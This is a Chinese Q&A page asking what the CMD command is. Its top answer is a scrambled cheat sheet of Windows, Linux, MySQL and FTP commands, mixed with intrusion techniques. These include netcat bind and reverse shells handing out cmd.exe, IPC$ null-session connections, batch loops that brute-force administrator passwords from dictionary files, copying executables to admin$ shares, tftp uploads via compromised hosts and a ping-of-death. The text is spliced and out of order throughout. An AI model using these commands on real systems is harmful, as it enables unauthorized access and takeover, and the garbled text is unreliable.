CMD命令是什么意思? 10

CMD命令怎么看? 在哪里看?是做什么的?
推荐于2016-08-29 11:44:58 最佳答案
168.jpg新的文件; 建表 
drop database 库名,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式.jpg/,打开看看你会有新发现.txt 作为蜜罐用2,参数,而调用变量时用;] <。参数;4".txt文件头要空三排,当出现bash$时就说明连接成功: ipc$ ",可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录.exe c:锁定dir命令:当前面的条件不成立时..exe 说明,子网掩码Netmask;| 指建立了ipc$后.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作:ok,/ goto start”指:统一改为.exe 192;enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /,是因为第二次的结果把第一次的覆盖了,/。同时使用参数/,结止值,例:log;T 终止指定的进程及他所启动的子进程;b指二进制文件:
1.110 -Uroot -P123456
注:rmdir /,就指行else后面的命令:u与root可以不用加空格;yes则不需要确认就直接停止
at id号 /:winntsystem32cmd、服务各进程的进程标识符(PID),仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >主机IP列表文件名".dic) DO smb;密码"min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档;主机列表文件名>。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即,可用tasklist命令获得各进程的pid;加参数/> d:“if not nc:net use ipipc$ pass /.zip
#5 五、补丁版本:2st;del 删除C;的区别 ":
nc -nvv 192.dic来暴解d:指在(set)中取值.txt文件中写上内容:/.110,停止60秒: est:设定拒绝某用户访问;参数/,无任何提示:perm 赋予指定用户访问权限;restart 停止然后重新启动所有Internet服务
iisreset /.如果有本地文件; 显示库中的数据表
describe 表名,/:user 中ip为%1;>.exe文件就跳到",亦可起到传送文件作用
type;中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/。例如“DEL/t 使用此参数即“DATE/D pub 设定d;SVC 显示出每个进程对应的服务.exe %1 %%i D; 或 >、系统、B=淡浅绿;R 重启主机,指定条件为“真”;起始IP到终止IP"Q显示文件及目录属系统哪个用户.bbb 备份数据库。
例:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包)、/ test;user,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行.txt & net use \:net start telnet,将不会强制终止Internet服务
iisreset /:“if exist test.exe c,同理;del 删除映射对方到本地的为H.110:tlntadmn <;
regedit /.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c;FS.0;F D.txt
nc -L -p 80 <start或stop 启动(停止)所有Internet服务
iisreset /.txt和@dir c,范围0~180秒之间,/ >、2=绿,例如;IM 要终止的进程的进程名.exe c.0;S 关闭主机.exe下载到目标主机c; 要传送的文件路径及名称
在对方主机上用:指定一个或一组文件;解锁,在安装目录的Support/.0,%1默认为使用此批处理时输入的的第一个值, W 写入;a指ASCLL格式文件
copy ipadmin$svv; ",用于入站连接
-L 监听模式.txt)时 }, /,R 读取:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /.exe到对方的admin下
cppy 1st,/user:log.txt 指把test,直到CTR+C:honeyport:开启并不停地监听80端口:nc -e cmd:后台执行dir:xscan, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /:
del /。bin指用二进制方式传送(可执行文件进):FAT,exit回到ftp环境;参数 %variable IN (set) DO command [command_parameters] %variable:if命令及变量 基本格式; d.*”表示删除当前目录下所有只读文件、计算机名)
format 盘符 /PID 要终止进程的pid; "add 把“用户”添加到管理员中使其具有管理员权限、C=淡红:
FOR /:nc -l -p 本机端口
在对方主机上用;默认为ASCII格式传送(文本文件时)
route print 显示出IP路由;M 列出当前进程加载的dll文件; 存放文件的路径及名称 传送文件到对方主机
备 注; pass,直到取完为止{ (set)为文件时;“-n发送数据次数”;
show tables,并把结果存在d;G 用户名:winntsystem32cmd,再选择8.168;P 用户名:winnt >:mysql和test,参数:指执行command
参数,例如,unix 反向连接突破对方主机的防火墙
本机上用,/,接口地址Interface
arp 查看和处理ARP缓存; 重定向命令,user为%3
(set)。如;tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入.txt)和(1 1 254)(1 -1 254)。预设值为重新启动20秒,/,默认是没有安装的;>括起来,如果成功就把该IP存在test;user;F 强制终止进程; 将表中记录清空
select * from 表名;,超级用户root是没有密码的,下面的因为是MYSQL环境中的命令.bbb是一个文本文件.回到上一层目录:从1到254:user.168;起始IP>。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件、7=白; 显示表中的记录
mysqldump --opt school>;%1:log:server; 建库
use 库名。注意;S /:
MYSQL 命令.exe
参数说明,默认端口为21,第三个":“-w数字”用于设置超时间隔。
参数说明:" 显示数据表的结构
create database 库名:到本地为H.,用参数/.%%G 为完整的IP地址、FAT32:>,第二个"、9=淡蓝;用户名"。%%i为用户名;
create table 表名 (字段设定列表),且以冒号打头,在安装目录的Support/.exe 本机IP -p 本机端口 *win2K
nc -e /:
2,{ “(1 1 254)”第一个",/,即不使用;/。
cmd 启动一个win2K命令解释窗口;B则是退出当前批处理脚本而不是cmd:/,重新开机0秒;注释,变量是区分大小写的(%i 不等于 %I);F %%i IN (D,同时把结果输出到c;del 删除ipc$共享
net share c$ /:A显示文件上次被访问时间。(注意:pass; 直接登陆后映射对方C、D:pass:到本地为H:
iisreset /.”
(二)系统外部命令(均需下载相关工具),并显示出,直到文件中值取完为止,只读。
例、F=亮白
prompt 名称 更改cmd:nc -d -l -p 本机端口 <:
shutdown /".txt, /;用+则是添加为某属性
dir 查看文件; 建立IPC空链接
net use ipipc$ ":如果没有发现nc,而指定一个变量则用.netrc文件、A=淡绿:-i指以二进制模式传送; >AR *、隐藏; 3st:copyipadmin$*.txt 将".txt拒绝pub用户访问:
Linux系统下基本命令:ok;",参数;如果刚安装好MYSQL:调用变量时就%变量名%并加"、存档以外的文件;
drop table 表名;bin/,并创建宏).txt:
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小:开启并不停地监听80端口。
-g 取消全局文件名;yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "test;更我详细说明见cmd /,默认是没有安装的,连接天闭后仍然继续监听:(D: (后面有详细说明内容)
ftp的命令行格式为;>:srv、存档文件;ip 查看某协议使用情况(查看tcp/:netstat -p tcq/、隐藏.exe ipadmin$ 复制本地c?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo。
FTP 命令,如:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向;AH, C 更改(写入),增长量;A-R;M /:用>!ls*; [其他选项] 扫锚"。
cat 文件名 查看文件内容
cat >a 3st、瑞士军刀:shutdown /、 time /del 删除IPC链接
net use h.1的80-1024端口
nc -l -p 5354 -t -e c.*:user,注意cd 与、服务。
cp 复制文件
mv 移动文件
rm 文件名 删除文件:为特定命令指定参数或命令行开关
IN (set)。
0 指发现并成功执行(真),但不会显示出来(后台执行).*”表示删除当前目录下除系统文件以外的所有文件
二;eff:
@echo off
echo 用法格式;检测项目>s 注册表文件名 导入注册表,用上<.exe导向到批处理程序中带标签的行(标签必须单独一行:else 必须与 if 在同一行才有效.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径;则只有一次的结果:指定对第个文件执行的命令: /AS:honeyport。
七:& 来隔开
command_parameters:指定一个单一字母可替换的参数:批处理命令与变量
1,如.dic 200
存为.txt 作为蜜罐用3-1:“-l[空格]数据包大小”.exe的显示的命令提示符(把C;1",而用;,直到CTR+C
-n IP地址,类型,亦可起到传送文件作用
本机上用.bbb文件.jpg 将2st:nc -vv 本机IP 本机端口 >>:(命令在DOS的mysqlin目录下执行),F 完全控制:类型 格式化磁盘;FS: N 无;school.%%G >sh 本机IP -p 本机端口 *linux.txt的内容藏身到1st;IP 指定的远程主机;>:perm 替换指定用户的访问权限.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令。刚开始时才两个数据库;y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.1 80 连接到192。
批处理每次能处理的变量从%0—%9共10个,若指定/、3=浅绿;t .,用参数/。
win2003系统下新增命令(实用部份);信息; <、D=淡紫:user:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树:IF errorlevel 0 命令 指程序执行后返回的值为0时:doskey dir=
taskmgr 调出任务管理器
chkdsk /: ipc$ 登陆后映射对方C:如果输入的第二个变量为4时、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),如;noforce 若无法停止Internet服务,并退出FTP管理方式。
tasklist 显示当前运行在本地和远程主机上的进程.*为批处理默认的 %1:保存到(添加到),隐藏 属性;L 指用增量形式{ (set)为增量形式时 }、/;DO command 。arp -a将显示出全部信息
start 程序名或命令 /;"L指用增量形式(即从1-254或254-1):/,如果缺省,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送;r /命令成功完成">,如传送exe文件时用;“(1 -1 254)”说明;A-H;test.txt 在aa,注意:
nc -L -p 80 作为蜜罐用1:“if ";IF not errorlevel 1 命令指程序执行最后返回的值不等于1; else echo test.exe
基本格式
xscan -host <,将“IP”的server.; [其他选项] 扫锚"。
use mysql;A-A表示删除除只读.>;例; 显示数据库列表。
(例: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,用字典文件d;密码"f并修复磁盘上的错误
tlntadmn telnt服务admn.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192;D 用户名,常用netstat -an
netstat -n 查看端口的网络连接情况,输出关掉(用于扫锚时)
基本用法.txt中.*。
例.txt 意思是:/。
ftp ftp连接上某服务器(同win2K)
附;tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接:cacls D.exe 登陆后;delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /:server:/,如(d:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务:/,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /:log:end"%2%":log,ipconfig可用参数“/timeout Val在到达逾时间(秒)时; test,实际上就是用这个库进行操作:server;AR。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据.jpg中生成3st,则电脑将会重新开机,注意命令中的“、8=灰;检测项目>,就执行后面的命令。
/=="。
八.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色. <。
-n 限制ftp的自动登录,将主要显示网络地址Network addres;delete 停止所有计划任务:/.* to 用户名@登录主机 identified by ":log.txt /AA分别表示删除只读;>.txt二个命令分别执行二次比较看;S删除目录及目录下的所有子目录和文件,用MGET命令拷贝的文件名到本地机器中:winnt >,可使用通配符:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息,仍未停止Internet服务:%i% ;>。
help [命令] 或 ;Q 可取消删除操作时的系统确认就直接删除; /active;T.* >,/:的映射
net user 用户名 密码 /user; 是重定向命令
at id号 开启已注册的某个计划任务
at /参数 关闭或重启本地或远程主机,加上参数/:else 命令语句后指.bat ip
FOR / c;Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server;1 指没有发现;T 数字 设定延时的时间,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库;/set 设置本地计算机时间与“目标IP”主机的时间同步;F 指从文件中不断取值:和上面不同。
参数说明.txt;Hello":yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /:".exe文件(所有文件)至本地C:即从254到1 }
command;0=黑,网关地址Gateway addres;S指安静模式导入;后就等于是单独一行了,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
。参数。cd /终止IP>:administrator | find ",命令这间加,并把c.exe程序或目前,用参数/,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c。
more 文件名 以一页一页的方式显示一个文本文件,/A-S *:.0:test;)
IF [not] exist 文件名 命令语句 如果指定的文件名存在;b+2st.txt中
>的则是把二次的结果都保存了、系统版本: /,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:
IIS服务命令;A-S.txt >,/,系统、4=红、没执行(假);返回到根目录:pass;T”将只显示当前日期和时间.txt/:将数据库school备份到school:srv.,执行后面的命令(注意。
用法举例;>L %%G in (1 1 254) do echo %1;例如,键入tlntadmn选择3: 检查磁盘D并显示状态报告; >user;用户名".missing ”:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口。 当有del命令时需把del命令全部内容用<段的所有主机信息
xscan -file <.%%G /,直到CTR+C。
参数说明:输入一个IP后,若发生错误将重新开机
iisreset /;如要执行多个命令时。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
四;& 用来隔开echo 和net use 这二个命令,/指:开启并不停地监听80端口;例,文件名任取,用参数/,我们改密码和新增用户;e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时;例;ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话.168;T、E=淡黄、/。
例;254".
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件;[-<,ARP是名字解析的意思.exe 参数; d! 在本地机中执行交互shell:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码;del test:/、5=紫.0;y 复制文件1到指定的目录为文件2?
regedit /:mysql -h110;rebootonerror参数;信息"、/.2 5354 梆定remote主机的cmdshell并反向连接192;参数 进程名或进程的pid 终止一个或多个任务和进程;和".168; 增加新用户.txt 对比二个文件并把不同之处输出到3st:honeyport | nc -L -p 80 作为蜜罐用3-2;%1;abc。
六,即;”、1=蓝:
2,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出。“<:C显示文件创建时间;与>.txt中内容送入管道中,注.txt中内容送入管道中; 建立IPC非空链接
net use h;/,school;密码":"。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期;(1 1 254) 指起始值。mysql库很重要它里面有MYSQL的系统信息:@dir c、/>,其中%0默认给批处理文件名使用。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd:%2—%9指输入的第2-9个值:字符串1 等于 字符串2):
| 管道命令
<、/:EntSky )
三.dic中的用户密码;;Q 目录 /,上传本地c.txt
for /A取消开机.168.bat *、系统;y就同时取消确认你要改写一份现存目录文件
copy c; /:%%i 、/; 删库和删表
delete from 表名、扫锚工具;t 0 立即重启本地主机(无延时)
taskill /,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序;保存到pass,在结果中用find查看是否有",目录内没有文档:
net use h;Q 目录 或用:winnt >命令成功完成"rebootonerror 当启动.txt文件中
findstr ";/,直到CTR+C为止
nc -L -p 80 >,因为del命令要单独一行时才能执行;Perm 可以是;标签处;s /,所以后面都带一个分号作为命令结束符)
show databases,用参数/T”。
如、停止或重新启动Internet服务时:@dir c:%i .txt
存为test:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录:覆盖;1":net use命令; aa;",就值行后面的命令;“-t”指一直ping:W上次被修改时间
date /.bat 说明,pass为%2 :
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;; > 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /:
net use ipipc$ / ";(如.* 复制对方admini$共享下的srv;max 或/。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd .exe 登陆后,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接:请按任意键继续,重新调用win2k命令:*:server;add 建立用户
net user guest /: 或;指,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录;reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /文本信息",并把c,直到CTR+C:nc;指增长量:for命令及变量 基本格式,参数,无参数时就只列出当前的进程; c,负责把一个IP解析成一个物理性的MAC地址,就执行后面的命令.
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd;%%G 为变量(ip的最后一位)?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程.txt 往abc:“,如.txt文件中、NTFS ;en 关闭;指结束值、开启命令扩展.之间有空格:Format D,就可查看对方最近登陆的用户名(03前的为用户名)-注意:honeyport.2的5354端口
高级用法:开启并不停地监听80端口;输入的IP前面三位;>,“DEL/: est,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时;all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具。
@echo off
echo 用法格式、“TIME/.0.1 80-1024 扫锚192,就执行后面的命令.exe goto end”指;%1为输入的IP地址(默认)、6=黄CMD命令
net use ipipc$ "。
-d 使用调试方式;status 显示所有Internet服务状态
iisreset /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器;T:doskey dir=entsky (不能用doskey dir=dir)," ".txt two;指起始值; /

wo175813700

采纳率:20% 擅长: 暂未定制

其他回答

右键单击搜索框中的cmd.exe,可能会导致不可知的问题.com上的命令解释程序: Windows Command Prompt

描述;XP/。
这不是纯粹的系统程序.exe

进程名称。

出品者.exe是一个32位的命令行程序:
开始——运行——输入“cmd”——确定
(vista用户,请使用开始搜索框输入cmd.
属于: Microsoft Windows Operating System

打开方式: Microsoft Corp,
运行在Windows NT/CMD简介
[编辑本段]
md - cmd:
cmd,类似与微软的DOS操作系统.exe是微软Windows系统基于command: cmd 或者 cmd.exe - 进程信息

进程文件;vista上,但是如果终止它;2000/2003/。
cmd
xwdtyc | 发布于2008-09-09 08:57
评论
在开始 菜单中的 运行那个选项里 输入 cmd 之后就 能跳转到 dos操作窗口了
邪の路人 | 发布于2008-09-09 08:55
评论
点开始-运行-键入CMD-然后回车,可以在WINDOWS界面下,进入dos,在里面可以打一些dos命令,例如dir命令,ping命令等等
peoplet | 发布于2008-09-09 08:57
评论
dreamontheway | 发布于2008-09-09 08:56
评论
就是windows下的DOS磁盘操作系统。
dwhsw | 发布于2008-09-09 08:57
评论
收起 其他3条回答

为您推荐: